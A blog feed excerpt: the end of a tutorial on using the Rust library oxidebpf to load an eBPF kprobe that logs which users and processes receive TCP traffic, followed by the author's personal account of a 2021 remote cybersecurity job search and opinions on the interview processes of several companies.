<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">oxidebpf</span><span class="p">::{</span><span class="n">Program</span><span class="p">,</span> <span class="n">ProgramBlueprint</span><span class="p">,</span> <span class="n">ProgramGroup</span><span class="p">,</span> <span class="n">ProgramType</span><span class="p">,</span> <span class="n">ProgramVersion</span><span class="p">};</span>
<span class="k">use</span> <span class="nn">users</span><span class="p">::</span><span class="n">get_user_by_id</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">convert</span><span class="p">::</span><span class="n">TryInto</span><span class="p">;</span>
</code></pre></div></div>
<p>Now we can start working on our main function. First we bring in the BPF
program binary and load it as a blueprint.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">let</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">include_bytes</span><span class="o">!</span><span class="p">(</span><span class="s">"../bpf/test_program_x86_64"</span><span class="p">);</span>
<span class="n">let</span> <span class="n">program_blueprint</span> <span class="o">=</span> <span class="n">ProgramBlueprint</span><span class="o">::</span><span class="n">new</span><span class="p">(</span><span class="n">bytes</span><span class="p">,</span> <span class="n">None</span><span class="p">).</span><span class="n">expect</span><span class="p">(</span><span class="s">"could not read program"</span><span class="p">);</span>
</code></pre></div></div>
<p>Next, we create a <code class="language-plaintext highlighter-rouge">Program</code> from the blueprint, specifying <code class="language-plaintext highlighter-rouge">tcp_recvmsg</code> as the
attach point.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">program</span> <span class="o">=</span> <span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
<span class="s">"trace_pid_event"</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="s">"tcp_recvmsg"</span><span class="p">],</span>
<span class="p">);</span>
</code></pre></div></div>
<p>Then we put the <code class="language-plaintext highlighter-rouge">Program</code> into a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> and <code class="language-plaintext highlighter-rouge">ProgramGroup</code> (more on
that later), using the blueprint from earlier.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">program_group</span> <span class="o">=</span> <span class="nn">ProgramGroup</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nb">None</span><span class="p">);</span>
</code></pre></div></div>
<p>Now we put the <code class="language-plaintext highlighter-rouge">Program</code> in a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> and tell the <code class="language-plaintext highlighter-rouge">ProgramGroup</code> to load
the programs from the blueprint. Since our program communicates with us, we can
get a receiving channel back.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">program_group</span>
<span class="nf">.load</span><span class="p">(</span>
<span class="n">program_blueprint</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="nn">ProgramVersion</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nd">vec!</span><span class="p">[</span><span class="n">program</span><span class="p">])],</span>
<span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not load program group"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">rx</span> <span class="o">=</span> <span class="n">program_group</span>
<span class="nf">.get_receiver</span><span class="p">()</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not get receiver channel"</span><span class="p">);</span>
<span class="n">And</span> <span class="n">finally</span><span class="p">,</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">channel</span> <span class="n">and</span> <span class="n">display</span> <span class="n">events</span> <span class="n">to</span> <span class="n">the</span> <span class="n">end</span><span class="o">-</span><span class="n">user</span><span class="py">.
loop</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">rx</span><span class="nf">.recv</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"msg recv err"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">pid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">0</span><span class="o">..</span><span class="mi">4</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">uid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">8</span><span class="o">..</span><span class="mi">12</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">get_user_by_uid</span><span class="p">(</span><span class="n">uid</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span>
<span class="nd">println!</span><span class="p">(</span>
<span class="s">"User [{}] '{}' received TCP in process [{}] {}"</span><span class="p">,</span>
<span class="n">uid</span><span class="p">,</span>
<span class="n">user</span><span class="nf">.name</span><span class="p">()</span><span class="nf">.to_str</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">(),</span>
<span class="n">pid</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_to_string</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"/proc/{}/cmdline"</span><span class="p">,</span> <span class="n">pid</span><span class="p">))</span><span class="nf">.unwrap</span><span class="p">()</span>
<span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The final <code class="language-plaintext highlighter-rouge">main()</code> function might look like this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">bytes</span> <span class="o">=</span> <span class="nd">include_bytes!</span><span class="p">(</span><span class="s">"../bpf/test_program_x86_64"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">program_blueprint</span> <span class="o">=</span> <span class="nn">ProgramBlueprint</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">bytes</span><span class="p">,</span> <span class="nb">None</span><span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not read program"</span><span class="p">);</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">program_group</span> <span class="o">=</span> <span class="nn">ProgramGroup</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nb">None</span><span class="p">);</span>
<span class="n">program_group</span>
<span class="nf">.load</span><span class="p">(</span>
<span class="n">program_blueprint</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="nn">ProgramVersion</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nd">vec!</span><span class="p">[</span><span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
<span class="nn">ProgramType</span><span class="p">::</span><span class="n">Kprobe</span><span class="p">,</span>
<span class="s">"trace_pid_event"</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="s">"tcp_recvmsg"</span><span class="p">],</span>
<span class="p">)])],</span>
<span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not load program group"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">rx</span> <span class="o">=</span> <span class="n">program_group</span>
<span class="nf">.get_receiver</span><span class="p">()</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"no channel returned"</span><span class="p">);</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">rx</span><span class="nf">.recv</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"msg recv err"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">pid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">0</span><span class="o">..</span><span class="mi">4</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">uid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">8</span><span class="o">..</span><span class="mi">12</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">get_user_by_uid</span><span class="p">(</span><span class="n">uid</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span>
<span class="nd">println!</span><span class="p">(</span>
<span class="s">"User [{}] '{}' received TCP in process [{}] {}"</span><span class="p">,</span>
<span class="n">uid</span><span class="p">,</span>
<span class="n">user</span><span class="nf">.name</span><span class="p">()</span><span class="nf">.to_str</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">(),</span>
<span class="n">pid</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_to_string</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"/proc/{}/cmdline"</span><span class="p">,</span> <span class="n">pid</span><span class="p">))</span><span class="nf">.unwrap</span><span class="p">()</span>
<span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If we run this program in a vagrant VM, we can see SSHD receiving packets.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vagrant@vagrant:~$ sudo ./bpf-blog
User [1000] 'vagrant' received TCP in process [54392] sshd: vagrant@pts/0
User [1000] 'vagrant' received TCP in process [54392] sshd: vagrant@pts/0
</code></pre></div></div>
<p>From here, the sky’s the limit!</p>
<script src="https://fast.wistia.com/embed/medias/zu6jwuuj45.jsonp" async=""></script>
<script src="https://fast.wistia.com/assets/external/E-v1.js" async=""></script>
<div class="wistia_responsive_padding" style="padding: 56.25% 0 0 0; position: relative;">
<div class="wistia_responsive_wrapper" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
<div class="wistia_embed wistia_async_zu6jwuuj45 seo=false videoFoam=true" style="height: 100%; position: relative; width: 100%;">
<p> </p><p> </p>
</div>
</div>
</div>
<p><em>A quick bootstrap example showing oxidebpf loading an eBPF program that
intercepts and prints a <code class="language-plaintext highlighter-rouge">curl google.com</code> command. The eBPF program can be
found in the <a href="https://github.com/redcanaryco/redcanary-ebpf-sensor">redcanary-ebpf-sensor
repo</a> under
<code class="language-plaintext highlighter-rouge">src/network-events.c</code>.</em></p>
<h2 id="how-is-the-project-structured">How is the project structured?</h2>
<p>You might be wondering why we wrapped our <code class="language-plaintext highlighter-rouge">Program</code> in a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> and
loaded our <code class="language-plaintext highlighter-rouge">ProgramVersion</code> from our <code class="language-plaintext highlighter-rouge">ProgramGroup</code>. That stems from the
primary use case for oxidebpf: write once, run anywhere (ish).</p>
<p>A <code class="language-plaintext highlighter-rouge">Program</code> represents an individual BPF program which may or may not work across
different kernel versions. Sometimes you’ll want to collect multiple <code class="language-plaintext highlighter-rouge">Program</code>s
together to achieve some functionality, we call this a <code class="language-plaintext highlighter-rouge">ProgramVersion</code>. The idea
is that you can group <code class="language-plaintext highlighter-rouge">Program</code>s that should run together on a specific kernel
version into the same <code class="language-plaintext highlighter-rouge">ProgramVersion</code>. But you may have multiple kernel versions
deployed in your environment, which require modified BPF programs, and you
don’t want to build a separate executable for each one. This is where the
<code class="language-plaintext highlighter-rouge">ProgramGroup</code> comes in. You can have a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> for each kernel in your
environment and put them all in a <code class="language-plaintext highlighter-rouge">ProgramGroup</code>. The <code class="language-plaintext highlighter-rouge">ProgramGroup</code> will attempt
to load each version in turn until one succeeds (and cleans up after itself
when they don’t).</p>
<p>To recap: <code class="language-plaintext highlighter-rouge">Program</code>s work together to create some desired functionality (in our
example, we have one <code class="language-plaintext highlighter-rouge">Program</code> that returns a PID and UID), <code class="language-plaintext highlighter-rouge">ProgramVersions</code>
group <code class="language-plaintext highlighter-rouge">Program</code>s together by an expected kernel version target (e.g., “this
<code class="language-plaintext highlighter-rouge">ProgramVersion</code> gets PIDs and UIDs on < 4.17, and this <code class="language-plaintext highlighter-rouge">ProgramVersion</code> gets
PIDs and UIDs on >= 4.17”), and <code class="language-plaintext highlighter-rouge">ProgramGroup</code>s combine <code class="language-plaintext highlighter-rouge">ProgramVersion</code>s to
run in as many places as possible (e.g., “this <code class="language-plaintext highlighter-rouge">ProgramGroup</code> will get PIDs and
UIDs”). The result is one executable you can run in multiple places, for
simplified deployment.</p>
<p>Now let’s look at the structure of the repository itself.</p>
<h3 id="src"><code class="language-plaintext highlighter-rouge">src/</code></h3>
<ul>
<li>
<p><code class="language-plaintext highlighter-rouge">lib.rs</code> is the main interface to the library. It’s where the <code class="language-plaintext highlighter-rouge">Program</code>,
<code class="language-plaintext highlighter-rouge">ProgramVersion</code>, and <code class="language-plaintext highlighter-rouge">ProgramGroup</code> types live. It’s also where we export
a few other types to the public interface, such as <code class="language-plaintext highlighter-rouge">ArrayMap</code>. Things like
loading logic and event polling go here.</p>
</li>
<li>
<p><code class="language-plaintext highlighter-rouge">blueprint.rs</code> is where we parse BPF object files. It turns bytes into programs
and map definitions and helps us apply map relocations.</p>
</li>
<li>
<p><code class="language-plaintext highlighter-rouge">maps.rs</code> handles helpers and methods that surround specific map types, such as
<code class="language-plaintext highlighter-rouge">PerfMap</code> and <code class="language-plaintext highlighter-rouge">ArrayMap</code>.</p>
</li>
<li>
<p><code class="language-plaintext highlighter-rouge">error.rs</code> holds our custom error types.</p>
</li>
<li>
<p>The <code class="language-plaintext highlighter-rouge">bpf</code> module handles everything related to BPF system calls. Constants
go in <code class="language-plaintext highlighter-rouge">constant.rs</code>, general types in <code class="language-plaintext highlighter-rouge">mod.rs</code>, and syscall functions in
<code class="language-plaintext highlighter-rouge">syscall.rs</code>.</p>
</li>
<li>
<p>The <code class="language-plaintext highlighter-rouge">perf</code> module handles everything related to perf system calls. Similarly,
constants go in <code class="language-plaintext highlighter-rouge">constant.rs</code>, general types in <code class="language-plaintext highlighter-rouge">mod.rs</code>, and syscall functions in
<code class="language-plaintext highlighter-rouge">syscall.rs</code>.</p>
</li>
</ul>
<h3 id="test"><code class="language-plaintext highlighter-rouge">test/</code></h3>
<ul>
<li>
<p>This is where we keep the BPF program we use for running tests. Before you run
any tests on oxidebpf, you must first build the test program from this folder
with <code class="language-plaintext highlighter-rouge">docker-compose run --rm test-builder</code>.</p>
</li>
<li>
<p>The <code class="language-plaintext highlighter-rouge">test_program.c</code> provides some maps and probes for testing purposes, and the
included <code class="language-plaintext highlighter-rouge">Makefile</code> will build for both <code class="language-plaintext highlighter-rouge">x86_64</code> and <code class="language-plaintext highlighter-rouge">aarch64</code>.</p>
</li>
</ul>
<h3 id="vagrant"><code class="language-plaintext highlighter-rouge">vagrant/</code></h3>
<ul>
<li>This folder holds various subfolders with <code class="language-plaintext highlighter-rouge">Vagrantfile</code>s you can use for running
tests on a variety of distributions and kernels. Some are happy to run under
<code class="language-plaintext highlighter-rouge">sudo</code> (Ubuntu) while some require testing as <code class="language-plaintext highlighter-rouge">root</code> (Centos and OpenSUSE).</li>
</ul>
<h2 id="whats-next">What’s next?</h2>
<p>One of the most common uses for BPF is to load and manage XDP programs, so one
of our immediate tasks will be to support XDP programs with the same simple
interface with which we support Kprobes and Uprobes. Instead of giving a kernel
symbol, you would give an interface and let oxidebpf take care of the rest.</p>
<p>After that, we will need to take care of more standard features such as
tracepoints and raw tracepoints. With those done we can move on to more
interesting security features, such as support for <a href="https://redcanary.com/blog/linux-security-testing/">Linux security
modules</a>. We’re also
hoping to get feedback from the security community to learn which features are
of interest for security tooling. If you have any ideas, <a href="https://github.com/redcanaryco/oxidebpf/pulls">submit a pull
request</a> or <a href="mailto:rafael@ortiz.sh">get in
touch</a>.</p>
<h2 id="keeping-up-to-date-with-kernel-support">Keeping up to date with kernel support</h2>
<p>As the kernel evolves and new BPF features are added, popular distributions
will gradually pick up more and more BPF-related capabilities. When these new
features gain sufficient market share they can be added to oxidebpf without
breaking the goal of write once, run (almost) anywhere. Also, thanks to the
efforts of kernel maintainers, oxidebpf should retain backwards compatibility
far into the future.</p>
<h2 id="how-can-i-contribute">How can I contribute?</h2>
<p>We welcome and encourage you to contribute if you find oxidebpf useful. You can
find the <a href="https://github.com/redcanaryco/oxidebpf">repository here</a> and the
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/CODE_OF_CONDUCT.md">code of conduct
here</a>.</p>
<p>When contributing, please keep in mind our goal of “compile once, run (almost)
everywhere.” That doesn’t mean we’ll reject newer features, like BTF support.
It just means our own contributions will prioritize stabilizing features that
are supported by as many kernel versions as possible (or at least allow it to
fail gracefully and clean up after itself if not supported). Ideally we’d like
to support any kernel version with eBPF, but a good rule of thumb is “will this
feature work or fail gracefully as early as kernel 4.4?”</p>
<p>Stay tuned for more updates!</p>Friday OrtizThis post was written for Red Canary and originally appeared on their site here.Looking for a Remote Cybersecurity Job in 20212021-08-07T17:00:00+00:002021-08-07T17:00:00+00:00https://ortiz.sh/work/2021/08/07/JOB-SEARCH<p>It’s been long enough that I’d like to document my job search and interview
process at a high level, hopefully for the benefit of others. If you’d like
to understand the position I was in before the job search, you can look
at my previous experiences <a href="/cv/">on my CV page</a>.</p>
<p><img src="/images/sankeymatic_2500x800.png" alt="a sankeymatic diagram of my job search" /></p>
<p>My criteria were: it had to be a security-focused role, it had to involve
hands on technical work, it had to be remote-first friendly.
Overall, I applied to 9 places, got 8 HR or recruiter screens, 6 hiring
manager interviews, 5 final round interviews, 2 offers, 2 rejections, and
1 out of time. I’m not going to go through all of them, but there’s a few
processes I’d like to call out.</p>
<h1 id="trail-of-bits">Trail of Bits</h1>
<p>This was by far the most humane and straightforward process. I was ultimately
rejected, but I can’t even be upset about it. The process was:</p>
<ul>
<li>Recruiter screen</li>
<li>Interview with hiring manager</li>
<li>Time boxed take-home assessment</li>
<li>Interview with team</li>
<li>Acceptance or rejection</li>
</ul>
<p>That’s it. Three calls, 30-60 minutes each, and one time boxed assignment
that only took me a few hours to complete. Everyone was friendly, honest,
and fair. The assignment tested the skills of the roles and didn’t take
an absurd amount of time to complete, and couldn’t be cheated by expending
undue effort. This is a model for other companies to follow.</p>
<h1 id="facebook">Facebook</h1>
<p>I want to call out how absurd this process is. I spoke with their recruiter
who told me I would not be eligible for a remote position because they typically
only extend those to senior engineers, who require 8 years of work experience
and I only have 6. Strike one. They also recommended me several books, study
material, practice courses, and said they general advise people study for 6 months
to 1 year to prepare for the Facebook interview process. Strike two. Your
corporation is evil and I don’t want to work there that bad. Then once the
process starts it can take a few months to complete, as there are several
long an intense interview loops where they make use of outdated concepts such
as whiteboarding. Strike three. I decided not to go any further, I was already
far long with several other companies.</p>
<p>The irony, of course, is that one of my work focuses now is BPF, which is the
product of many of the Linux Kernel engineers either employed by or sponsored
by Facebook. I’m sure I’d love to be on one of their teams, but not if this
is still the process.</p>
<h1 id="amazon">Amazon</h1>
<p>The recruiter that spoke to me was robotic. She blasted through every question
like a machine, and wrote my answers like a court stenographer. Rapidfire and
inhuman. The hiring manager grilled me pretty aggressively on web security
trivia. The light in this person’s eyes had clearly gone out long ago. I can
still hear them saying “We are a data driven company, Rafael.” When I asked
about their performance review process. Everything you do is logged, catalogued,
processed, and analyzed. Add to that the stack ranking controversy and I can see
why the recruiter was robotic: gotta get those metrics up! The hiring managers
crushed soul was the product of a soul crushing environment. I asked some friends
who work at Amazon and enjoy it how they can possibly get by in this
environment. They said they loved the routine, they loved the data on themselves,
they loved being able to microoptimize their behaviors to hit metrics and
quantitatively assess themselves. I guess. Definitely not for me, and I think
they could tell. I can’t imagine this environment produces much innovation, and
I’m a researcher at heart.</p>
<p>I’m glad they rejected me, I consider this one a bullet dodged.</p>
<h1 id="twilio">Twilio</h1>
<p>I don’t have many comments on the process itself, it was pretty much the same
as Red Canary and Blend. However, I do want to point out the people that worked
there. This seems to be a company that really cares about their employees
and they make that evident in the interview process. The hiring manager was
incredibly friendly, and when discussing the benefits of the role mentioned
“there really aren’t enough worker protections in this country.” The fact that
a hiring manager can even say that openly to a candidate speaks volumes. They
rejected me in the final round because they had another candidate that solved
their immediate needs, but I’d apply again in the future.</p>
<h1 id="blend">Blend</h1>
<p>Pretty typical interview process. Started with a screen from a very friendly
recruiter, then a non-technical interview with the hiring manager. There was
a dead simple live coding exercise that was basically “before we move further
I need to know that you can actually write python.” It was low stress and fair.
Then we moved on to technical interviews with the hiring manager and the team.
Everyone I met there was an excellent human being, and I felt like it was the
most diverse team I had met in my interviewing process so kudos to them.</p>
<p>The red flags, unfortunately, came after I got an offer from them. They all
started adding me on LinkedIn and talking to me like I was already working there,
which felt just a tad pushy. The fact that everyone on the team did it weirded
me out a little. I got another offer from another company that had more cash
and less equity, but also aligned more with my interests (research). The
recruiter kept emphasizing the equity, and showing me these spreadsheets with
huge numbers, talking about how the equity would be worth millions under their
five year plan. <a href="https://blend.com/blog/news/announcing-ipo/">Blend announced their IPO last month.</a>
The equity would have been worthless, and their executives knew that. They were
enticing engineers with huge equity packages on a one year cliff they knew they’d
never have to deliver on. Incredibly shady, and I’m glad I didn’t take this offer.
I had friends who had worked at other startups advise me that any startup equity
is basically worthless, and to treat it as a lottery ticket.</p>
<p>I’d love to work with these humans, but not for this company.</p>
<h1 id="red-canary">Red Canary</h1>
<p>This had the same kind of process ad Blend and Twilio, but with a take home
assignment instead of a live assignment. This was the most time consuming
take home assignment but it was also the one that excited me the most. I’ve
told friends, “my dream job is getting paid to mess around in the Linux kernel,”
and that’s basically what they were offering me.</p>
<p>I know people say not to normalize long take-home interview assignments, since
it can be abusive. However, I was too intrigued by the premise of these
assignments to turn it down. I honestly couldn’t stop thinking about them, and
felt like I really wanted to do them anyway. I told them during the interview
that if this is reflective of the day to day work, they’d have to remind me
to take time off (which, as it turns out, my manager has had to do). I ultimately
accepted an offer here.</p>
<p>So I’d say if you do get a lengthy take home assignment, at least see what it’s
about before rejecting it out of turn. You might like it!</p>Friday OrtizIt’s been long enough that I’d like to document my job search and interview process at a high level, hopefully for the benefit of others. If you’d like to understand the position I was in before the job search, you can look at my previous experiences on my CV page.